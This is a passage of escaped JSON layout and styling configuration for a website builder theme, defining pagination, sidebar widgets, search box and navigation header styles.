erticalInnerGap\":2}}},{\"id\":154,\"type\":\"hop-archive-pagination\",\"nodeId\":\"26-m14\",\"style\":{\"descendants\":{\"paginationNumbers\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"paginationActiveNumber\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"}}}}},\"v\":\"1.1\",\"nodes\":[\"639-m17\",\"40-m17\"]},{\"id\":155,\"type\":\"hop-column\",\"nodeId\":\"25-m24\",\"nodes\":[\"639-m18\",\"40-m18\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"15\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":156,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"1725-m27\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"639-m19\",\"40-m19\"]},{\"id\":157,\"type\":\"hop-row\",\"nodeId\":\"38-m2\",\"props\":{\"layout\":{\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":1,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"v\":\"1.1\",\"nodes\":[\"639-m20\",\"40-m20\"]},{\"id\":158,\"type\":\"hop-column\",\"nodeId\":\"38-m3\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"nodes\":[\"639-m21\",\"40-m21\"],\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":159,\"type\":\"hop-archive-navigation\",\"nodeId\":\"38-m9\",\"v\":\"1.1\",\"nodes\":[\"639-m22\",\"40-m22\"]},{\"id\":160,\"type\":\"hop-sidebar\",\"nodeId\":\"4455-s1\",\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}},\"v\":\"1.1\",\"nodes\":[\"438-s1\",\"43-s1\"]},{\"id\":161,\"type\":\"hop-section\",\"nodeId\":\"28-s9\",\"nodes\":[\"438-s2\",\"43-s2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\"}}}}},\"v\":\"1.1\"},{\"id\":162,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"28-s13\",\"nodes\":[\"438-s13\",\"43-s13\"],\"v\":\"1.1\"},{\"id\":163,\"type\":\"hop-column\",\"nodeId\":\"28-s14\",\"nodes\":[\"438-s14\",\"43-s14\"],\"v\":\"1.1\"},{\"id\":164,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"28-s15\",\"nodes\":[\"438-s15\",\"43-s15\"],\"v\":\"1.1\"},{\"id\":165,\"type\":\"hop-text\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s16\",\"43-s16\"],\"v\":\"1.1\"},{\"id\":166,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1},\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"nodeId\":\"28-s10\",\"nodes\":[\"438-s3\",\"43-s3\"],\"v\":\"1.1\"},{\"id\":167,\"type\":\"hop-column\",\"nodeId\":\"28-s12\",\"nodes\":[\"438-s4\",\"43-s4\"],\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":168,\"type\":\"hop-widget-area\",\"nodeId\":\"1719-s2\",\"style\":{\"descendants\":{\"widgetBox\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"20\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"textAlign\":\"center\"}}},\"widgetListItemLink\":{\"typography\":{\"color\":\"${theme.colors.4|variant3}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"widgetListItem\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"padding\":{\"top\":{\"value\":\"4\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"4\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"widgetTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"widgetList\":{\"listStyleType\":\"none\"},\"widgetInput\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"focus\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}}}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}}},\"v\":\"1.1\",\"nodes\":[\"438-s5\",\"43-s5\"]},{\"id\":169,\"type\":\"hop-search-widget\",\"nodeId\":\"1719-s3\",\"style\":{\"descendants\":{\"widget-box\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},\"background\":{\"color\":\"\"}},\"widget-title\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}},\"bottom\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}},\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}},\"widget-input\":{\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}},\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"widget-button\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"transition\":{\"duration\":{\"value\":\"0.5\"}},\"typography\":{\"color\":\"${theme.colors.5}\"},\"display\":\"inline-block\",\"background\":{\"color\":\"rgb(249, 250, 251)\"}},\"widget-button-icon\":{\"display\":\"inline-block\"},\"widget-button-text\":{\"display\":\"none\"},\"widget-input-placeholder\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"v\":\"1.1\",\"nodes\":[\"438-s6\",\"43-s6\"],\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}}},{\"id\":170,\"type\":\"hop-recent-post-widget\",\"nodeId\":\"1719-s4\",\"v\":\"1.1\",\"nodes\":[\"438-s7\",\"43-s7\"]},{\"id\":171,\"type\":\"hop-recent-comments-widget\",\"nodeId\":\"1719-s5\",\"v\":\"1.1\",\"nodes\":[\"438-s8\",\"43-s8\"]},{\"id\":172,\"type\":\"hop-archives-widget\",\"nodeId\":\"1719-s6\",\"v\":\"1.1\",\"props\":{\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false},\"nodes\":[\"438-s9\",\"43-s9\"]},{\"id\":173,\"type\":\"hop-categories-widget\",\"nodeId\":\"1719-s7\",\"v\":\"1.1\",\"nodes\":[\"438-s10\",\"43-s10\"]},{\"id\":174,\"type\":\"hop-meta-widget\",\"nodeId\":\"1719-s8\",\"v\":\"1.1\",\"nodes\":[\"438-s11\",\"43-s11\"]},{\"id\":175,\"type\":\"hop-text-widget\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s12\",\"43-s12\"],\"v\":\"1.1\"},{\"id\":176,\"type\":\"hop-sidebar\",\"nodeId\":\"4455-s1\",\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}},\"v\":\"1.1\",\"nodes\":[\"438-s1\",\"46-s1\"]},{\"id\":177,\"type\":\"hop-section\",\"nodeId\":\"28-s9\",\"nodes\":[\"438-s2\",\"46-s2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\"},\"bottom\":{\"value\":\"0\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\"}}}}},\"v\":\"1.1\"},{\"id\":178,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"28-s13\",\"nodes\":[\"438-s13\",\"46-s13\"],\"v\":\"1.1\"},{\"id\":179,\"type\":\"hop-column\",\"nodeId\":\"28-s14\",\"nodes\":[\"438-s14\",\"46-s14\"],\"v\":\"1.1\"},{\"id\":180,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"28-s15\",\"nodes\":[\"438-s15\",\"46-s15\"],\"v\":\"1.1\"},{\"id\":181,\"type\":\"hop-text\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s16\",\"46-s16\"],\"v\":\"1.1\"},{\"id\":182,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1},\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"nodeId\":\"28-s10\",\"nodes\":[\"438-s3\",\"46-s3\"],\"v\":\"1.1\"},{\"id\":183,\"type\":\"hop-column\",\"nodeId\":\"28-s12\",\"nodes\":[\"438-s4\",\"46-s4\"],\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":184,\"type\":\"hop-widget-area\",\"nodeId\":\"1719-s2\",\"style\":{\"descendants\":{\"widgetBox\":{\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"20\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"textAlign\":\"center\"}}},\"widgetListItemLink\":{\"typography\":{\"color\":\"${theme.colors.4|variant3}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"widgetListItem\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"decoration\":\"none\",\"weight\":\"400\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"family\":\"Open Sans\"},\"padding\":{\"top\":{\"value\":\"4\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"4\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"widgetTitle\":{\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"600\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"widgetList\":{\"listStyleType\":\"none\"},\"widgetInput\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"weight\":\"400\",\"family\":\"Open Sans\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}},\"states\":{\"focus\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}}}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}}},\"v\":\"1.1\",\"nodes\":[\"438-s5\",\"46-s5\"]},{\"id\":185,\"type\":\"hop-search-widget\",\"nodeId\":\"1719-s3\",\"style\":{\"descendants\":{\"widget-box\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"color\":\"rgb(238, 238, 238)\",\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},\"background\":{\"color\":\"\"}},\"widget-title\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}},\"bottom\":{\"radius\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}},\"typography\":{\"color\":\"${theme.colors.5}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}},\"widget-input\":{\"border\":{\"top\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"bottom\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"}},\"style\":\"none\"},\"right\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"},\"left\":{\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"style\":\"none\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"12\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"12\",\"unit\":\"px\"}},\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"widget-button\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}},\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgb(249, 250, 251)\"},\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"transition\":{\"duration\":{\"value\":\"0.5\"}},\"typography\":{\"color\":\"${theme.colors.5}\"},\"display\":\"inline-block\",\"background\":{\"color\":\"rgb(249, 250, 251)\"}},\"widget-button-icon\":{\"display\":\"inline-block\"},\"widget-button-text\":{\"display\":\"none\"},\"widget-input-placeholder\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"v\":\"1.1\",\"nodes\":[\"438-s6\",\"46-s6\"],\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}}},{\"id\":186,\"type\":\"hop-recent-post-widget\",\"nodeId\":\"1719-s4\",\"v\":\"1.1\",\"nodes\":[\"438-s7\",\"46-s7\"]},{\"id\":187,\"type\":\"hop-recent-comments-widget\",\"nodeId\":\"1719-s5\",\"v\":\"1.1\",\"nodes\":[\"438-s8\",\"46-s8\"]},{\"id\":188,\"type\":\"hop-archives-widget\",\"nodeId\":\"1719-s6\",\"v\":\"1.1\",\"props\":{\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false},\"nodes\":[\"438-s9\",\"46-s9\"]},{\"id\":189,\"type\":\"hop-categories-widget\",\"nodeId\":\"1719-s7\",\"v\":\"1.1\",\"nodes\":[\"438-s10\",\"46-s10\"]},{\"id\":190,\"type\":\"hop-meta-widget\",\"nodeId\":\"1719-s8\",\"v\":\"1.1\",\"nodes\":[\"438-s11\",\"46-s11\"]},{\"id\":191,\"type\":\"hop-text-widget\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s12\",\"46-s12\"],\"v\":\"1.1\"},{\"id\":192,\"nodeId\":\"25-h28\",\"nodes\":[\"25-h28\"],\"style\":[],\"v\":\"1.1\"},{\"id\":193,\"type\":\"hop-content\",\"nodeId\":\"20-c1\",\"nodes\":[\"20-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":194,\"type\":\"hop-header\",\"v\":\"1.1\",\"nodes\":[\"22-h1\"]},{\"id\":195,\"style\":{\"ancestor\":{\"sticky\":{\"background\":{\"color\":\"#ffffff\"},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"0\",\"blur\":\"4\"}]}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"20\"},\"bottom\":{\"path\":\"value\",\"value\":\"20\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"background\":{\"color\":\"#ffffff\"}},\"type\":\"hop-navigation\",\"props\":{\"overlap\":false,\"sticky\":true,\"stickyStartAt\":\"immediately\",\"width\":\"boxed\",\"showTopBar\":false},\"v\":\"1.1\",\"nodes\":[\"22-h2\"]},{\"id\":196,\"props\":{\"containerWidth\":\"boxed\",\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"22-h66\"]},{\"id\":197,\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\